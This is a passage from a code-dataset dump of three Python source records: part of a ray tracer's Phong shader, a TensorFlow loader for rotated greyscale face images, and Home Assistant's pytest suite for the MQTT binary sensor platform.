Vec3(1.,1.,1.), shininess: float = 10.0, reflectivity: float = 0.0, refraction: float = 1.0):\n Material.__init__(self, color, shininess, reflectivity, refraction)\n\n def shade(self, camera: Camera, ray: Ray, hitrecord: HitRecord, lights: list) -> Vec3:\n \"\"\"\n Shade method: Phong\n\n phong shader\n \"\"\"\n colorsum = Vec3(0.,0.,0.)\n\n if len(lights)>0:\n for light in lights:\n N = hitrecord.normal_g\n L = normalize3(hitrecord.point - light.position)\n E = normalize3(camera.position - hitrecord.point)\n R = normalize3(-reflect3(L, N))\n diffuse = max(1. - dot3(N, L), 0.0)\n specular = pow(max(dot3(R, E), 0.0), 0.3 * self.shininess)\n color = self.color * 0.5 * (diffuse + specular) * hitrecord.color\n colorsum += color\n colorsum /= len(lights)\n colorsum = clamp3(colorsum, Vec3(0.,0.,0.), Vec3(1.,1.,1.))\n else:\n # no light in scene, use material color\n colorsum = self.color * hitrecord.color\n\n return colorsum\n\n"} {"ext": "py", "sha": "1a30826f7435bcf292804ed9da94487d44c58d5a", "content": "import numpy as np\nimport os\nimport pickle\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom skimage.transform import rotate, resize\nfrom skimage import exposure\nimport skimage.io as io\n\n\n\nfrom config import FLAGS\n\n\ndef load_facegreyreduxshuffled_set(batch_size, is_training=True):\n path = os.path.join('data', 'facegreyredux')\n if is_training:\n fd = open(os.path.join(path, 'facegreyredux'), 'rb')\n # loaded = np.fromfile(file=fd, dtype=np.uint8)\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((50000, 28, 28, 1)).astype(np.float32)\n\n fd = open(os.path.join(path, 'facegreyreduxcat'), 'rb')\n # loaded = np.fromfile(file=fd, dtype=np.uint8)\n loaded = np.asarray(pickle.load(fd))\n trainY = loaded.reshape((50000)).astype(np.int32)\n\n data_set = list(zip(trainX,trainY))\n np.random.shuffle(data_set)\n trainX, trainY = list(zip(*data_set))\n trainX = np.asarray(trainX).reshape((50000, 28, 28, 1)).astype(np.float32)\n trainY = np.asarray(trainY).reshape((50000)).astype(np.int32)\n trX = trainX[:40000] / 255.\n trY = trainY[:40000]\n\n valX = trainX[40000:, ] / 255.\n valY = trainY[40000:]\n\n num_tr_batch = 40000 // batch_size\n num_val_batch = 10000 // batch_size\n\n return trX, trY, num_tr_batch, valX, valY, num_val_batch\n else:\n if (FLAGS.flickr):\n fd = open(os.path.join(path, 'flickrsetgreyredux'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((10000, 28, 28)).astype(np.float32) / 255.\n else:\n fd = open(os.path.join(path, 'facegreyreduxeval'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((10000, 28, 28)).astype(np.float32) / 255.\n\n fd = open(os.path.join(path, 'facegreyreduxevalcat'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainY = loaded.reshape((10000)).astype(np.int32)\n\n rotatedlist = []\n for image in trainX:\n image = rotate(image, FLAGS.rotation, preserve_range=True)\n if(FLAGS.mooney):\n v_min, v_max = np.percentile(image, (49.99999999, 51))\n image = exposure.rescale_intensity(image, in_range=(v_min, v_max))\n rotatedlist.append(image)\n if(len(rotatedlist)==1000):\n I = resize(image.reshape(28, 28), (128, 128))\n io.imsave(\"rotate\" + str(FLAGS.rotation) + \"example.jpg\", I, cmap='gray')\n rotatedlist = np.asarray(rotatedlist)\n plt.imshow(rotatedlist[33], cmap='gray')\n plt.show()\n trainX = rotatedlist.reshape((10000, 28, 28, 1)).astype(np.float32)\n\n return trainX, trainY\n\n\ndef create_inputs_norb(path, is_train: bool):\n \"\"\"Get a batch from the input pipeline.\n\n Author:\n Ashley Gritzman 15/11/2018\n Args:\n is_train:\n Returns:\n img, lab:\n \"\"\"\n if is_train:\n trX, trY, num_tr_batch, valX, valY, num_val_batch = load_facegreyreduxshuffled_set(FLAGS.batch_size, is_train)\n else:\n trX, trY = load_facegreyreduxshuffled_set(FLAGS.batch_size, is_train)\n\n def generator():\n for e1, e2 in zip(trX, trY):\n yield e1, e2\n\n capacity = 2000 + 3 * FLAGS.batch_size\n # Create batched dataset\n tf_dataset = tf.data.Dataset.from_generator(generator, output_types=(tf.float32, tf.int32), output_shapes=(tf.TensorShape(list(trX[0].shape)), ())).repeat().shuffle(capacity).batch(batch_size=FLAGS.batch_size, drop_remainder=True).prefetch(1)\n\n # dataset = input_fn(path, is_train)\n\n # Create one-shot iterator\n iterator = tf.compat.v1.data.make_one_shot_iterator(tf_dataset)\n\n img, lab = iterator.get_next()\n\n output_dict = {'image': img,\n 'label': lab}\n\n return output_dict\n"} {"ext": "py", "sha": "1a30836d074dd9e595ba028a8883a2a758ec1d47", "content": "\"\"\"The tests for the MQTT binary sensor platform.\"\"\"\nimport copy\nfrom datetime import datetime, timedelta\nimport json\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom homeassistant.components import binary_sensor\nfrom homeassistant.const import (\n EVENT_STATE_CHANGED,\n STATE_OFF,\n STATE_ON,\n STATE_UNAVAILABLE,\n STATE_UNKNOWN,\n)\nimport homeassistant.core as ha\nfrom homeassistant.setup import async_setup_component\nimport homeassistant.util.dt as dt_util\n\nfrom .test_common import (\n help_test_availability_when_connection_lost,\n help_test_availability_without_topic,\n help_test_custom_availability_payload,\n help_test_default_availability_payload,\n help_test_discovery_broken,\n help_test_discovery_removal,\n help_test_discovery_update,\n help_test_discovery_update_attr,\n help_test_discovery_update_unchanged,\n help_test_entity_debug_info_message,\n help_test_entity_device_info_remove,\n help_test_entity_device_info_update,\n help_test_entity_device_info_with_connection,\n help_test_entity_device_info_with_identifier,\n help_test_entity_id_update_discovery_update,\n help_test_entity_id_update_subscriptions,\n help_test_setting_attribute_via_mqtt_json_message,\n help_test_setting_attribute_with_template,\n help_test_unique_id,\n help_test_update_with_json_attrs_bad_JSON,\n help_test_update_with_json_attrs_not_dict,\n)\n\nfrom tests.common import async_fire_mqtt_message, async_fire_time_changed\n\nDEFAULT_CONFIG = {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n }\n}\n\n\nasync def test_setting_sensor_value_expires_availability_topic(hass, mqtt_mock, caplog):\n \"\"\"Test the expiration of the value.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n \"availability_topic\": \"availability-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n async_fire_mqtt_message(hass, \"availability-topic\", \"online\")\n\n # State should be unavailable since expire_after is defined and > 0\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n await expires_helper(hass, mqtt_mock, caplog)\n\n\nasync def test_setting_sensor_value_expires(hass, mqtt_mock, caplog):\n \"\"\"Test the expiration of the value.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n # State should be unavailable since expire_after is defined and > 0\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n await expires_helper(hass, mqtt_mock, caplog)\n\n\nasync def expires_helper(hass, mqtt_mock, caplog):\n \"\"\"Run the basic expiry code.\"\"\"\n realnow = dt_util.utcnow()\n now = datetime(realnow.year + 1, 1, 1, 1, tzinfo=dt_util.UTC)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n\n # Value was set correctly.\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Time jump +3s\n now = now + timedelta(seconds=3)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Next message resets timer\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(hass, \"test-topic\", \"OFF\")\n await hass.async_block_till_done()\n\n # Value was updated correctly.\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n # Time jump +3s\n now = now + timedelta(seconds=3)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n # Time jump +2s\n now = now + timedelta(seconds=2)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is expired now\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n\nasync def test_expiration_on_discovery_and_discovery_update_of_binary_sensor(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test that binary_sensor with expire_after set behaves correctly on discovery and discovery update.\"\"\"\n config = {\n \"name\": \"Test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n }\n\n config_msg = json.dumps(config)\n\n # Set time and publish config message to create binary_sensor via discovery with 4 s expiry\n realnow = dt_util.utcnow()\n now = datetime(realnow.year + 1, 1, 1, 1, tzinfo=dt_util.UTC)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that binary_sensor is not available\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n # Publish state message\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n\n # Test that binary_sensor has correct state\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Advance +3 seconds\n now = now + timedelta(seconds=3)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # binary_sensor is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Resend config message to update discovery\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that binary_sensor has not expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Add +2 seconds\n now = now + timedelta(seconds=2)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Test that binary_sensor has expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n # Resend config message to update discovery\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that binary_sensor is still expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n\nasync def test_setting_sensor_value_via_mqtt_message(hass, mqtt_mock):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"OFF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_invalid_sensor_value_via_mqtt_message(hass, mqtt_mock, caplog):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"0N\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n assert \"No matching payload found for entity\" in caplog.text\n caplog.clear()\n assert \"No matching payload found for entity\" not in caplog.text\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"0FF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert \"No matching payload found for entity\" in caplog.text\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template(hass, mqtt_mock):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": '{%if is_state(entity_id,\"on\")-%}OFF'\n \"{%-else-%}ON{%-endif%}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template2(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": \"{{value | upper}}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"on\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"off\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n async_fire_mqtt_message(hass, \"test-topic\", \"illegal\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n assert \"template output: 'ILLEGAL'\" in caplog.text\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template_and_raw_state_encoding(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test processing a raw value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"encoding\": \"\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": \"{%if value|unpack('b')-%}ON{%else%}OFF{%-endif-%}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", b\"\\x01\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", b\"\\x00\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_setting_sensor_value_via_mqtt_message_empty_template(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": '{%if value == \"ABC\"%}ON{%endif%}',\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"DEF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n assert \"Empty template output\" in caplog.text\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ABC\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n\nasync def test_valid_device_class(hass, mqtt_mock):\n \"\"\"Test the setting of a valid sensor class.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"device_class\": \"motion\",\n \"state_topic\": \"test-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.attributes.get(\"device_class\") == \"motion\"\n\n\nasync def test_invalid_device_class(hass, mqtt_mock):\n \"\"\"Test the setting of an invalid sensor class.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"device_class\": \"abc123\",\n \"state_topic\": \"test-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state is None\n\n\nasync def test_availability_when_connection_lost(hass, mqtt_mock):\n \"\"\"Test availability after MQTT disconnection.\"\"\"\n await help_test_availability_when_connection_lost(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_availability_without_topic(hass, mqtt_mock):\n \"\"\"Test availability without defined availability topic.\"\"\"\n await help_test_availability_without_topic(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_default_availability_payload(hass, mqtt_mock):\n \"\"\"Test availability by default payload with defined topic.\"\"\"\n await help_test_default_availability_payload(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_custom_availability_payload(hass, mqtt_mock):\n \"\"\"Test availability by custom payload with defined topic.\"\"\"\n await help_test_custom_availability_payload(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_force_update_disabled(hass, mqtt_mock):\n \"\"\"Test force update option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n @ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n\nasync def test_force_update_enabled(hass, mqtt_mock):\n \"\"\"Test force update option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n @ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n assert len(events) == 2\n\n\nasync def test_off_delay(hass, mqtt_mock):\n \"\"\"Test off_delay option.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"off_delay\": 30,\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n events = []\n\n @ha.callback\n def callback(event):\n \"\"\"Verify event got called.\"\"\"\n events.append(event)\n\n hass.bus.async_listen(EVENT_STATE_CHANGED, callback)\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert len(events) == 1\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert len(events) == 2\n\n async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=30))\n await hass.async_block_till_done()\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n assert len(events) == 3\n\n\nasync def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock):\n \"\"\"Test the setting of attribute via MQTT with JSON payload.\"\"\"\n await help_test_setting_attribute_via_mqtt_json_message(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_setting_attribute_with_template(hass, mqtt_mock):\n \"\"\"Test the setting of attribute via MQTT with JSON payload.\"\"\"\n await help_test_setting_attribute_with_template(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog):\n \"\"\"Test attributes get extracted from a JSON result.\"\"\"\n await help_test_update_with_json_attrs_not_dict(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_update_with_json_attrs_bad_JSON(hass, mqtt_mock, caplog):\n \"\"\"Test attributes get extracted from a JSON result.\"\"\"\n await help_test_update_with_json_attrs_bad_JSON(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_discovery_update_attr(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered MQTTAttributes.\"\"\"\n await help_test_discovery_update_attr(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_unique_id(hass, mqtt_mock):\n \"\"\"Test unique id option only creates one sensor per unique_id.\"\"\"\n config = {\n binary_sensor.DOMAIN: [\n {\n \"platform\": \"mqtt\",\n \"name\": \"Test 1\",\n \"state_topic\": \"test-topic\",\n \"unique_id\": \"TOTALLY_UNIQUE\",\n },\n {\n \"platform\": \"mqtt\",\n \"name\": \"Test 2\",\n \"state_topic\": \"test-topic\",\n \"unique_id\": \"TOTALLY_UNIQUE\",\n },\n ]\n }\n await help_test_unique_id(hass, mqtt_mock, binary_sensor.DOMAIN, config)\n\n\nasync def test_discovery_removal_binary_sensor(hass, mqtt_mock, caplog):\n \"\"\"Test removal of discovered binary_sensor.\"\"\"\n data = json.dumps(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n await help_test_discovery_removal(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data\n )\n\n\nasync def test_discovery_update_binary_sensor_topic_template(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config2 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n config2[\"name\"] = \"Milk\"\n config1[\"state_topic\"] = \"sensor/state1\"\n config2[\"state_topic\"] = \"sensor/state2\"\n config1[\"value_template\"] = \"{{ value_json.state1.state }}\"\n config2[\"value_template\"] = \"{{ value_json.state2.state }}\"\n\n state_data1 = [\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"ON\"}}')], \"on\", None),\n ]\n state_data2 = [\n ([(\"sensor/state2\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ([(\"sensor/state2\", '{\"state2\":{\"state\":\"ON\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state2\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state2\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ]\n\n await help_test_discovery_update(\n hass,\n mqtt_mock,\n caplog,\n binary_sensor.DOMAIN,\n config1,\n config2,\n state_data1=state_data1,\n state_data2=state_data2,\n )\n\n\nasync def test_discovery_update_binary_sensor_template(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config2 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n config2[\"name\"] = \"Milk\"\n config1[\"state_topic\"] = \"sensor/state1\"\n config2[\"state_topic\"] = \"sensor/state1\"\n config1[\"value_template\"] = \"{{ value_json.state1.state }}\"\n config2[\"value_template\"] = \"{{ value_json.state2.state }}\"\n\n state_data1 = [\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"ON\"}}')], \"on\", None),\n ]\n state_data2 = [\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"ON\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state1\":{\"state\":\"OFF\"}}')], \"on\", None),\n ([(\"sensor/state1\", '{\"state2\":{\"state\":\"OFF\"}}')], \"off\", None),\n ]\n\n await help_test_discovery_update(\n hass,\n mqtt_mock,\n caplog,\n binary_sensor.DOMAIN,\n config1,\n config2,\n state_data1=state_data1,\n state_data2=state_data2,\n )\n\n\nasync def test_discovery_update_unchanged_binary_sensor(hass, mqtt_mock, caplog):\n \"\"\"Test update of discovered binary_sensor.\"\"\"\n config1 = copy.deepcopy(DEFAULT_CONFIG[binary_sensor.DOMAIN])\n config1[\"name\"] = \"Beer\"\n\n data1 = json.dumps(config1)\n with patch(\n \"homeassistant.components.mqtt.binary_sensor.MqttBinarySensor.discovery_update\"\n ) as discovery_update:\n await help_test_discovery_update_unchanged(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data1, discovery_update\n )\n\n\n@pytest.mark.no_fail_on_log_exception\nasync def test_discovery_broken(hass, mqtt_mock, caplog):\n \"\"\"Test handling of bad discovery message.\"\"\"\n data1 = '{ \"name\": \"Beer\",' ' \"off_delay\": -1 }'\n data2 = '{ \"name\": \"Milk\",' ' \"state_topic\": \"test_topic\" }'\n await help_test_discovery_broken(\n hass, mqtt_mock, caplog, binary_sensor.DOMAIN, data1, data2\n )\n\n\nasync def test_entity_device_info_with_connection(hass, mqtt_mock):\n \"\"\"Test MQTT binary sensor device registry integration.\"\"\"\n await help_test_entity_device_info_with_connection(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_with_identifier(hass, mqtt_mock):\n \"\"\"Test MQTT binary sensor device registry integration.\"\"\"\n await help_test_entity_device_info_with_identifier(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_update(hass, mqtt_mock):\n \"\"\"Test device registry update.\"\"\"\n await help_test_entity_device_info_update(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_device_info_remove(hass, mqtt_mock):\n \"\"\"Test device registry remove.\"\"\"\n await help_test_entity_device_info_remove(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_id_update_subscriptions(hass, mqtt_mock):\n \"\"\"Test MQTT subscriptions are managed when entity_id is updated.\"\"\"\n await help_test_entity_id_update_subscriptions(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_id_update_discovery_update(hass, mqtt_mock):\n \"\"\"Test MQTT discovery update when entity_id is updated.\"\"\"\n await help_test_entity_id_update_discovery_update(\n hass, mqtt_mock, binary_sensor.DOMAIN, DEFAULT_CONFIG\n )\n\n\nasync def test_entity_debug_info_message(hass, mqtt_mock):\n \"\"\"Test MQTT debug info.\"\"\"\n await help_test_entity_debug_info_message(\n hass, 